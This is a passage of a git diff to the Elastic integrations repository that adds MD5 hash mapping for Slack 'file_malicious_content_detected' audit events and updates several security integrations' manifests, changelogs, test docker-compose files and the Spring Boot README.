McUser","team":"user-team"}},"context":{"ip_address":"81.2.69.144","location":{"domain":"domain.tld","id":"eedd1a7d-1a92-418d-8b01-51a4c809d0fb","name":"The Place","type":"workspace"},"session_id":913888259765,"ua":"com.tinyspeck.chatlyio/23.04.40 (iPhone; iOS 1.4.1; Scale/3.00)"},"date_create":1683836275,"details":{"url_private":"https://example.com/"},"entity":{"file":{"filetype":"image/png","id":"7edc4c42-f925-47af-979a-22c10e1fefed","name":"image.png","title":"image.png"},"type":"file"},"id":"2db28060-1659-4b27-ad55-fdba12e3a7b1"} {"id":"16f5fb41-c67c-4cf5-a5c4-d90cb58dd5f9","date_create":1673631531,"action":"anomaly","actor":{"type":"user","user":{"id":"e65b0f5c","name":"roy","email":"aaron@demo.com"}},"entity":{"type":"user","user":{"id":"asdfasdf","name":"Joe Bob","email":"jbob@example.com","team":"T234SAH2"}},"context":{"location":{"type":"workspace","id":"e65b11aa","name":"Docker","domain":"Docker"},"ua":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:23.0) Gecko/20131011 Firefox/23.0","ip_address":"81.2.69.143"},"details":{"action_timestamp":1673631621862,"location":"England, GB","previous_ip_address":"175.16.199.64","previous_ua":"","reason":["asn","ip_address"]}} -{"action":"anomaly","actor":{"type":"user","user":{"email":"john@example.com","id":"U04V6RBUPAK","name":"John Doe","team":"Z0937DXQX"}},"context":{"ip_address":"192.168.220.224","location":{"domain":"example","id":"Z0937DXQX","name":"Acme","type":"workspace"},"session_id":9982493323637,"ua":"com.tinyspeck.chatlyio/23.07.10 (iPhone; iOS 16.5.1; Scale/3.00)"},"date_create":1689249764,"details":{"action_timestamp":1689249716345113,"location":"Tokyo, JP","previous_ip_address":"192.168.79.87","previous_ua":"com.tinyspeck.chatlyio.NotificationService/23.07.10 (iPhone; iOS 16.5.1; Scale/3.00)","reason":["asn","ip_address"]},"entity":{"type":"user","user":{"email":"john@example.com","id":"U04V6RBUPAK","name":"John Doe","team":"Z0937DXQX"}},"id":"abc8e17e-c081-4b82-a515-4c54674e3de4"} \ No newline at end of file +{"action":"anomaly","actor":{"type":"user","user":{"email":"john@example.com","id":"U04V6RBUPAK","name":"John Doe","team":"Z0937DXQX"}},"context":{"ip_address":"192.168.220.224","location":{"domain":"example","id":"Z0937DXQX","name":"Acme","type":"workspace"},"session_id":9982493323637,"ua":"com.tinyspeck.chatlyio/23.07.10 (iPhone; iOS 16.5.1; Scale/3.00)"},"date_create":1689249764,"details":{"action_timestamp":1689249716345113,"location":"Tokyo, JP","previous_ip_address":"192.168.79.87","previous_ua":"com.tinyspeck.chatlyio.NotificationService/23.07.10 (iPhone; iOS 16.5.1; Scale/3.00)","reason":["asn","ip_address"]},"entity":{"type":"user","user":{"email":"john@example.com","id":"U04V6RBUPAK","name":"John Doe","team":"Z0937DXQX"}},"id":"abc8e17e-c081-4b82-a515-4c54674e3de4"} +{"action":"file_malicious_content_detected","actor":{"type":"user","user":{"email":"XXXXXXX@elastic.co","id":"U01MF9XXXX","name":"XXXXXx","team":"T0CUXXXXX"}},"context":{"ip_address":"81.2.69.143","location":{"domain":"elastic","id":"XXXXXX","name":"Elastic","type":"workspace"},"session_id":5458207163185,"ua":"Mozilla/5.0 (Windows NT 10.0.19045; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Slack/4.36.140 Chrome/120.0.6099.227 Electron/28.2.0 Safari/537.36 OS_Product/Workstation Servicing_Channel/SAC Sonic Slack_SSB/4.36.140"},"date_create":1709627947,"details":{"md5_hash":"7e2b2819a67bb11b0ca280c1d0646f42"},"entity":{"file":{"filetype":"","id":"F06XXXXXXX","name":"mimi.zip","title":""},"type":"file"},"id":"bbcf1d28-4012-4771-8179-8a59c6f2bffa"} diff --git a/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json b/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json index 36c8cb37895..59c7692888a 100644 --- a/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json +++ b/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json @@ -406,6 +406,98 @@ "version": "16.5.1" } } + }, + { + "@timestamp": "2024-03-05T08:39:07.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "file_malicious_content_detected", + "category": [ + "file", + "malware" + ], + "id": "bbcf1d28-4012-4771-8179-8a59c6f2bffa", + "kind": "event", + "original": "{\"action\":\"file_malicious_content_detected\",\"actor\":{\"type\":\"user\",\"user\":{\"email\":\"XXXXXXX@elastic.co\",\"id\":\"U01MF9XXXX\",\"name\":\"XXXXXx\",\"team\":\"T0CUXXXXX\"}},\"context\":{\"ip_address\":\"81.2.69.143\",\"location\":{\"domain\":\"elastic\",\"id\":\"XXXXXX\",\"name\":\"Elastic\",\"type\":\"workspace\"},\"session_id\":5458207163185,\"ua\":\"Mozilla/5.0 (Windows NT 10.0.19045; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Slack/4.36.140 Chrome/120.0.6099.227 Electron/28.2.0 Safari/537.36 OS_Product/Workstation Servicing_Channel/SAC Sonic Slack_SSB/4.36.140\"},\"date_create\":1709627947,\"details\":{\"md5_hash\":\"7e2b2819a67bb11b0ca280c1d0646f42\"},\"entity\":{\"file\":{\"filetype\":\"\",\"id\":\"F06XXXXXXX\",\"name\":\"mimi.zip\",\"title\":\"\"},\"type\":\"file\"},\"id\":\"bbcf1d28-4012-4771-8179-8a59c6f2bffa\"}", + "type": [ + "info" + ] + }, + "file": { + "hash": { + "md5": "7e2b2819a67bb11b0ca280c1d0646f42" + } + }, + "related": { + "hash": [ + "7e2b2819a67bb11b0ca280c1d0646f42" + ], + "ip": [ + "81.2.69.143" + ], + "user": [ + "U01MF9XXXX", + "XXXXXXX@elastic.co" + ] + }, + "slack": { + "audit": { + "context": { + "domain": "elastic", + "id": "XXXXXX", + "name": "Elastic", + "session_id": "5458207163185", + "type": "workspace" + }, + "details": { + "md5": "7e2b2819a67bb11b0ca280c1d0646f42" + }, + "entity": { + "entity_type": "file", + "id": "F06XXXXXXX", + "name": "mimi.zip" + } + } + }, + "source": { + "address": "81.2.69.143", + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": "XXXXXXX@elastic.co", + "full_name": "XXXXXx", + "id": "U01MF9XXXX" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Slack Desktop Client", + "original": "Mozilla/5.0 (Windows NT 10.0.19045; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Slack/4.36.140 Chrome/120.0.6099.227 Electron/28.2.0 Safari/537.36 OS_Product/Workstation Servicing_Channel/SAC Sonic Slack_SSB/4.36.140", + "os": { + "full": "Windows 10", + "name": "Windows", + "version": "10" + }, + "version": "4.36.140" + } } ] } \ No newline at end of file diff --git a/packages/slack/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/slack/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index ea50001a538..5a3a649d99e 100644 --- a/packages/slack/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/slack/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -140,6 +140,20 @@ processors: field: json.details.reason target_field: slack.audit.details.reason ignore_missing: true + - rename: + field: json.details.md5_hash + target_field: slack.audit.details.md5 + ignore_missing: true + - append: + field: related.hash + value: '{{slack.audit.details.md5}}' + allow_duplicates: false + if: ctx.slack?.audit?.details?.md5 != null + - set: + field: file.hash.md5 + copy_from: slack.audit.details.md5 + ignore_empty_value: true + if: ctx.slack?.audit?.entity?.entity_type == "file" - script: if: ctx.json?.details?.action_timestamp != null && ctx.json.details.action_timestamp > 1e13 description: Parse action_timestamp as microseconds since unix epoch. diff --git a/packages/slack/data_stream/audit/fields/ecs.yml b/packages/slack/data_stream/audit/fields/ecs.yml index 75e26d1c53d..f7210a05058 100644 --- a/packages/slack/data_stream/audit/fields/ecs.yml +++ b/packages/slack/data_stream/audit/fields/ecs.yml @@ -16,6 +16,8 @@ external: ecs - name: event.original external: ecs +- name: file.hash.md5 + external: ecs - name: related.ip external: ecs - name: related.user @@ -44,6 +46,8 @@ external: ecs - name: source.ip external: ecs +- name: related.hash + external: ecs - name: tags external: ecs - name: user.email diff --git a/packages/slack/data_stream/audit/fields/fields.yml b/packages/slack/data_stream/audit/fields/fields.yml index b6d5965310e..52c904b9102 100644 --- a/packages/slack/data_stream/audit/fields/fields.yml +++ b/packages/slack/data_stream/audit/fields/fields.yml @@ -34,6 +34,11 @@ description: > The location the activity occured in when event.action is anomaly + - name: details.md5 + type: keyword + description: > + The md5 hash of a file associated with a `file_malicious_content_detected` event. + - name: details.previous_ip_address type: ip description: > diff --git a/packages/slack/data_stream/audit/manifest.yml b/packages/slack/data_stream/audit/manifest.yml index a4e8fbed144..4be37fd9861 100644 --- a/packages/slack/data_stream/audit/manifest.yml +++ b/packages/slack/data_stream/audit/manifest.yml @@ -10,6 +10,7 @@ streams: multi: false required: true show_user: true + secret: true - name: interval type: text title: Interval diff --git a/packages/slack/docs/README.md b/packages/slack/docs/README.md index 4b3ed0365e8..d781a6250fd 100644 --- a/packages/slack/docs/README.md +++ b/packages/slack/docs/README.md @@ -67,6 +67,7 @@ Audit logs summarize the history of changes made within the Slack Enterprise. | event.module | Event module | constant_keyword | | event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | | event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| file.hash.md5 | MD5 hash. | keyword | | host.architecture | Operating system architecture. | keyword | | host.containerized | If the host is a container. | boolean | | host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | @@ -88,6 +89,7 @@ Audit logs summarize the history of changes made within the Slack Enterprise. | log.file.path | Path to the log file. | keyword | | log.flags | Flags for the log file. | keyword | | log.offset | Offset of the entry in the log file. | long | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | | related.ip | All of the IPs seen on your event. | ip | | related.user | All the user names or other user identifiers seen on the event. | keyword | | slack.audit.context.domain | The domain of the Workspace or Enterprise | keyword | @@ -96,6 +98,7 @@ Audit logs summarize the history of changes made within the Slack Enterprise. | slack.audit.context.session_id | The identifier that is unique to each authenticated session. | keyword | | slack.audit.context.type | The type of account. Either `Workspace` or `Enterprise` | keyword | | slack.audit.details.location | The location the activity occured in when event.action is anomaly | keyword | +| slack.audit.details.md5 | The md5 hash of a file associated with a `file_malicious_content_detected` event. | keyword | | slack.audit.details.previous_ip_address | The IP address previously observed for the entity in the event when event.action is anomaly | ip | | slack.audit.details.previous_user_agent | The User-Agent string previously observed for the entity in the event when event.action is anomaly | keyword | | slack.audit.details.reason | The anomaly rule triggered to generate the event when event.action is anomaly: asn, excessive_downloads, ip_address, session_fingerprint, tor, user_agent | keyword | diff --git a/packages/slack/manifest.yml b/packages/slack/manifest.yml index aec4ef7292a..6c5b44846f9 100644 --- a/packages/slack/manifest.yml +++ b/packages/slack/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: slack title: "Slack Logs" -version: "1.17.1" +version: "1.19.0" description: "Slack Logs Integration" type: integration categories: @@ -9,7 +9,7 @@ categories: - security conditions: kibana: - version: "^8.10.1" + version: "^8.12.0" icons: - src: /img/slack.svg title: Slack logo diff --git a/packages/snort/changelog.yml b/packages/snort/changelog.yml index e4a5ab7a509..4ce0b70a5a2 100644 --- a/packages/snort/changelog.yml +++ b/packages/snort/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.15.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.14.1" changes: - description: Fix exclude_files pattern. diff --git a/packages/snort/manifest.yml b/packages/snort/manifest.yml index 9b99521d898..c37f5029a8e 100644 --- a/packages/snort/manifest.yml +++ b/packages/snort/manifest.yml @@ -1,6 +1,6 @@ name: snort title: Snort -version: "1.14.1" +version: "1.15.0" description: Collect logs from Snort with Elastic Agent. type: integration icons: @@ -8,7 +8,7 @@ icons: title: snort size: 120x60 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.3" categories: [ids_ips, security] conditions: kibana: diff --git a/packages/snyk/changelog.yml b/packages/snyk/changelog.yml index 83040a60fa6..c66488d9728 100644 --- a/packages/snyk/changelog.yml +++ b/packages/snyk/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.20.1" + changes: + - description: Add cloudsecurity_cdr sub category label + type: enhancement + link: https://github.com/elastic/integrations/pull/9213 +- version: "1.20.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 - version: "1.19.1" changes: - description: Changed owners diff --git a/packages/snyk/manifest.yml b/packages/snyk/manifest.yml index e3bff46257d..0763696d525 100644 --- a/packages/snyk/manifest.yml +++ b/packages/snyk/manifest.yml @@ -1,14 +1,15 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: snyk title: "Snyk" -version: "1.19.1" +version: "1.20.1" description: Collect logs from Snyk with Elastic Agent. type: integration categories: - security + - cloudsecurity_cdr conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" icons: - src: /img/snyk-logo.svg title: Snyk logo @@ -44,6 +45,7 @@ policy_templates: multi: false show_user: true required: true + secret: true - name: http_client_timeout type: text title: HTTP Client Timeout diff --git a/packages/sonicwall_firewall/_dev/deploy/docker/docker-compose.yml b/packages/sonicwall_firewall/_dev/deploy/docker/docker-compose.yml index a54aa0d278d..186f54ccf28 100644 --- a/packages/sonicwall_firewall/_dev/deploy/docker/docker-compose.yml +++ b/packages/sonicwall_firewall/_dev/deploy/docker/docker-compose.yml @@ -7,8 +7,7 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" sonicwall_firewall-syslog: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9514 -p=udp /sample_logs/log.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9514 -p=udp /sample_logs/log.log diff --git a/packages/sonicwall_firewall/changelog.yml b/packages/sonicwall_firewall/changelog.yml index 7a92556ba3e..5314f0f5a30 100644 --- a/packages/sonicwall_firewall/changelog.yml +++ b/packages/sonicwall_firewall/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.16.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.15.0" changes: - description: Add ecs fields mappings for event.sequence, event.severity, host.ip, http.request.body.bytes. diff --git a/packages/sonicwall_firewall/manifest.yml b/packages/sonicwall_firewall/manifest.yml index 55e7d6cea93..35cce33a4d6 100644 --- a/packages/sonicwall_firewall/manifest.yml +++ b/packages/sonicwall_firewall/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: sonicwall_firewall title: "SonicWall Firewall" -version: "1.15.0" +version: "1.16.0" description: "Integration for SonicWall firewall logs" type: integration categories: diff --git a/packages/sophos/_dev/deploy/docker/docker-compose.yml b/packages/sophos/_dev/deploy/docker/docker-compose.yml index ca49071f72c..df62ffc70f3 100644 --- a/packages/sophos/_dev/deploy/docker/docker-compose.yml +++ b/packages/sophos/_dev/deploy/docker/docker-compose.yml @@ -7,32 +7,27 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" sophos-utm-udp: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=udp /sample_logs/sophos-utm*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=udp /sample_logs/sophos-utm*.log sophos-utm-tcp: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=tcp /sample_logs/sophos-utm*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=tcp /sample_logs/sophos-utm*.log sophos-xg-udp: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=udp /sample_logs/sophos-xg*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=udp /sample_logs/sophos-xg*.log sophos-xg-tcp: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=tcp /sample_logs/sophos-xg*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9549 -p=tcp /sample_logs/sophos-xg*.log sophos-xg-tls: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9550 -p=tls --insecure /sample_logs/sophos-xg*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9550 -p=tls --insecure /sample_logs/sophos-xg*.log diff --git a/packages/sophos/changelog.yml b/packages/sophos/changelog.yml index dd6a9dc0c7c..8210b44a59f 100644 --- a/packages/sophos/changelog.yml +++ b/packages/sophos/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "3.9.0" + changes: + - description: Update package-spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "3.8.2" changes: - description: Changed owners diff --git a/packages/sophos/manifest.yml b/packages/sophos/manifest.yml index d363542b631..2e8c1396420 100644 --- a/packages/sophos/manifest.yml +++ b/packages/sophos/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: sophos title: Sophos -version: "3.8.2" +version: "3.9.0" description: Collect logs from Sophos with Elastic Agent. categories: - "security" diff --git a/packages/sophos_central/changelog.yml b/packages/sophos_central/changelog.yml index 367c30632ab..61e07f75170 100644 --- a/packages/sophos_central/changelog.yml +++ b/packages/sophos_central/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.14.0" + changes: + - description: Set sensitive values as secret and fix incorrect mapping. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 +- version: "1.13.2" + changes: + - description: Ensure from_date parameter is within bounds. + type: bugfix + link: https://github.com/elastic/integrations/pull/9143 - version: "1.13.1" changes: - description: Changed owners diff --git a/packages/sophos_central/data_stream/alert/agent/stream/httpjson.yml.hbs b/packages/sophos_central/data_stream/alert/agent/stream/httpjson.yml.hbs index d7af95442d4..5379b8aaaca 100644 --- a/packages/sophos_central/data_stream/alert/agent/stream/httpjson.yml.hbs +++ b/packages/sophos_central/data_stream/alert/agent/stream/httpjson.yml.hbs @@ -25,8 +25,8 @@ request.transforms: value: {{tenant_id}} - set: target: url.params.from_date - value: '[[.cursor.from_date]]' - default: '[[(now (parseDuration "-{{initial_interval}}")).Unix]]' + value: '[[max .cursor.from_date ((now).Add (parseDuration "-23h59m")).Unix]]' + default: '[[max (now (parseDuration "-23h59m")).Unix (now (parseDuration "-{{initial_interval}}")).Unix]]' - set: target: url.params.limit value: {{batch_size}} diff --git a/packages/sophos_central/data_stream/alert/fields/fields.yml b/packages/sophos_central/data_stream/alert/fields/fields.yml index 91ca03c301f..e552a5a1221 100644 --- a/packages/sophos_central/data_stream/alert/fields/fields.yml +++ b/packages/sophos_central/data_stream/alert/fields/fields.yml @@ -28,7 +28,7 @@ - name: items type: group fields: - - name: descriptior + - name: descriptor type: keyword description: Descriptor of items. - name: process_path diff --git a/packages/sophos_central/data_stream/event/agent/stream/httpjson.yml.hbs b/packages/sophos_central/data_stream/event/agent/stream/httpjson.yml.hbs index b8bcf9e3193..08654aef8f1 100644 --- a/packages/sophos_central/data_stream/event/agent/stream/httpjson.yml.hbs +++ b/packages/sophos_central/data_stream/event/agent/stream/httpjson.yml.hbs @@ -25,8 +25,8 @@ request.transforms: value: {{tenant_id}} - set: target: url.params.from_date - value: '[[.cursor.from_date]]' - default: '[[(now (parseDuration "-{{initial_interval}}")).Unix]]' + value: '[[max .cursor.from_date ((now).Add (parseDuration "-23h59m")).Unix]]' + default: '[[max (now (parseDuration "-23h59m")).Unix (now (parseDuration "-{{initial_interval}}")).Unix]]' - set: target: url.params.limit value: {{batch_size}} diff --git a/packages/sophos_central/docs/README.md b/packages/sophos_central/docs/README.md index ed29ff5224e..7df48147f80 100644 --- a/packages/sophos_central/docs/README.md +++ b/packages/sophos_central/docs/README.md @@ -272,7 +272,7 @@ An example event for `alert` looks as following: | sophos_central.alert.customer_id | The unique identifier of the customer linked with this record. | keyword | | sophos_central.alert.data.app_id | App identifier. | keyword | | sophos_central.alert.data.certificates | Certificates of alert. | keyword | -| sophos_central.alert.data.core_remedy.items.descriptior | Descriptor of items. | keyword | +| sophos_central.alert.data.core_remedy.items.descriptor | Descriptor of items. | keyword | | sophos_central.alert.data.core_remedy.items.process_path | Process path of sophos items. | keyword | | sophos_central.alert.data.core_remedy.items.result | The following values are allowed: NOT_APPLICABLE, SUCCESS, NOT_FOUND, DELETED, FAILED_TO_DELETE, WHITELISTED, OTHER_ERROR, FAILED_TO_DELETE_SYSTEM_PROTECTED. | keyword | | sophos_central.alert.data.core_remedy.items.sophos_pid | Process id of sophos items. | keyword | diff --git a/packages/sophos_central/manifest.yml b/packages/sophos_central/manifest.yml index 270ea65cc71..2b47e94fc0c 100644 --- a/packages/sophos_central/manifest.yml +++ b/packages/sophos_central/manifest.yml @@ -1,14 +1,14 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: sophos_central title: Sophos Central -version: "1.13.1" +version: "1.14.0" description: This Elastic integration collects logs from Sophos Central with Elastic Agent. type: integration categories: - security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: subscription: "basic" screenshots: @@ -55,6 +55,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: tenant_id type: text title: Tenant ID @@ -77,6 +78,7 @@ policy_templates: required: true show_user: false default: https://id.sophos.com + secret: false - name: proxy_url type: text title: Proxy URL diff --git a/packages/spring_boot/_dev/build/docs/README.md b/packages/spring_boot/_dev/build/docs/README.md index 226e839b3bb..5e4e26df65c 100644 --- a/packages/spring_boot/_dev/build/docs/README.md +++ b/packages/spring_boot/_dev/build/docs/README.md @@ -1,17 +1,45 @@ # Spring Boot integration +## Overview + The Spring Boot integration is used to fetch observability data from [Spring Boot Actuator web endpoints](https://docs.spring.io/spring-boot/docs/2.6.3/actuator-api/htmlsingle/) and ingest it into Elasticsearch. +Use the Spring Boot integration to: + +- Collect logs related to audit events, HTTP trace, and metrics related to garbage collection(gc), memory, and threading. +- Create visualizations to monitor, measure, and analyze usage trends and key data, deriving business insights. +- Create alerts to reduce the MTTD and MTTR by referencing relevant logs when troubleshooting an issue. + +## Data streams + +The Spring Boot integration collects logs and metrics data. + +Logs help you keep a record of events that occur on your machine. The Log data streams collected by Spring Boot integration are `auditevents` and `httptrace`, allowing users to track authentication events, HTTP request and response details, enabling comprehensive monitoring and security auditing. + +Metrics provide insight into the statistics of Spring Boot. The Metrics data streams collected by the Spring Boot integration include auditevents, gc, httptrace, memory, and threading, enabling users to monitor and troubleshoot the performance of Spring Boot instances. + +Data streams: +- `auditevents`: Collects information related to the authentication status, remote address, document ID and principal. +- `gc`: Collects information related to the GC collector name, memory usage before and after collection, thread count, and time metrics. +- `httptrace`: Collects information related to the http requests, status response, principal and session details. +- `memory`: Collects information related to the heap and non-heap memory, buffer pool and manager. +- `threading`: Collects information related to the thread allocations, monitoring and CPU times. + +Note: +- Users can monitor and view the logs inside the ingested documents for Spring Boot in the `logs-*` index pattern from `Discover`, while for metrics, the index pattern is `metrics-*`. + ## Compatibility This integration has been tested against Spring Boot v2.7.17 with LTS JDK versions 8, 11, 17, and 21. ## Requirements +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended or self-manage the Elastic Stack on your own hardware. + In order to ingest data from Spring Boot: - You must know the host for Spring Boot application, add that host while configuring the integration package. - Add default path for jolokia. -- Spring-boot-actuator module provides all Spring Boot’s production-ready features. So add below dependency in `pom.xml` file. +- Spring-boot-actuator module provides all Spring Boot's production-ready features. You also need to add the following dependency to the `pom.xml` file: ``` org.springframework.boot @@ -28,11 +56,19 @@ In order to ingest data from Spring Boot: - To expose `HTTP Trace` metrics following class can be used [InMemoryHttpTraceRepository](https://docs.spring.io/spring-boot/docs/2.0.6.RELEASE/api/org/springframework/boot/actuate/trace/http/InMemoryHttpTraceRepository.html). - To expose `Audit Events` metrics following class can be used [InMemoryAuditEventRepository](https://docs.spring.io/spring-boot/docs/current/api/org/springframework/boot/actuate/audit/InMemoryAuditEventRepository.html). -### Troubleshooting +## Setup + +For step-by-step instructions on how to set up an integration, see the [Getting Started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +## Validation + +After the integration is successfully configured, click on the *Assets* tab of the Spring Boot Integration to display the available dashboards. Select the dashboard for your configured data stream, which should be populated with the required data. + +## Troubleshooting -- If **[Spring Boot] Audit Events panel** does not display older documents after upgrading to ``0.9.0`` or later versions, then this issue can be solved by reindexing the ``Audit Events`` data stream's indices. -- If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Audit Events`` data stream's indices. -- If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Garbage Collector``, ``Memory`` and ``Threading`` data stream's indices. +- If **[Spring Boot] Audit Events panel** does not display older documents after upgrading to ``0.9.0`` or later versions, this issue can be resolved by reindexing the ``Audit Events`` data stream. +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Audit Events`` data stream. +- If `host.ip` appears conflicted under the ``metrics-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Garbage Collector``, ``Memory`` and ``Threading`` data stream. ## Logs diff --git a/packages/spring_boot/changelog.yml b/packages/spring_boot/changelog.yml index 4d73df02cbe..abc00c5b4a2 100644 --- a/packages/spring_boot/changelog.yml +++ b/packages/spring_boot/changelog.yml @@ -1,4 +1,29 @@ # newer versions go on top +- version: "1.4.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.3.2" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.3.1" + changes: + - description: Update README to follow documentation guidelines. + type: enhancement + link: https://github.com/elastic/integrations/pull/9070 +- version: "1.3.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 +- version: "1.2.2" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/8423 - version: "1.2.1" changes: - description: Add null and ignore_missing check to handle event.original field. diff --git a/packages/spring_boot/docs/README.md b/packages/spring_boot/docs/README.md index 384934c4d00..0bd32cf577f 100644 --- a/packages/spring_boot/docs/README.md +++ b/packages/spring_boot/docs/README.md @@ -1,17 +1,45 @@ # Spring Boot integration +## Overview + The Spring Boot integration is used to fetch observability data from [Spring Boot Actuator web endpoints](https://docs.spring.io/spring-boot/docs/2.6.3/actuator-api/htmlsingle/) and ingest it into Elasticsearch. +Use the Spring Boot integration to: + +- Collect logs related to audit events, HTTP trace, and metrics related to garbage collection(gc), memory, and threading. +- Create visualizations to monitor, measure, and analyze usage trends and key data, deriving business insights. +- Create alerts to reduce the MTTD and MTTR by referencing relevant logs when troubleshooting an issue. + +## Data streams + +The Spring Boot integration collects logs and metrics data. + +Logs 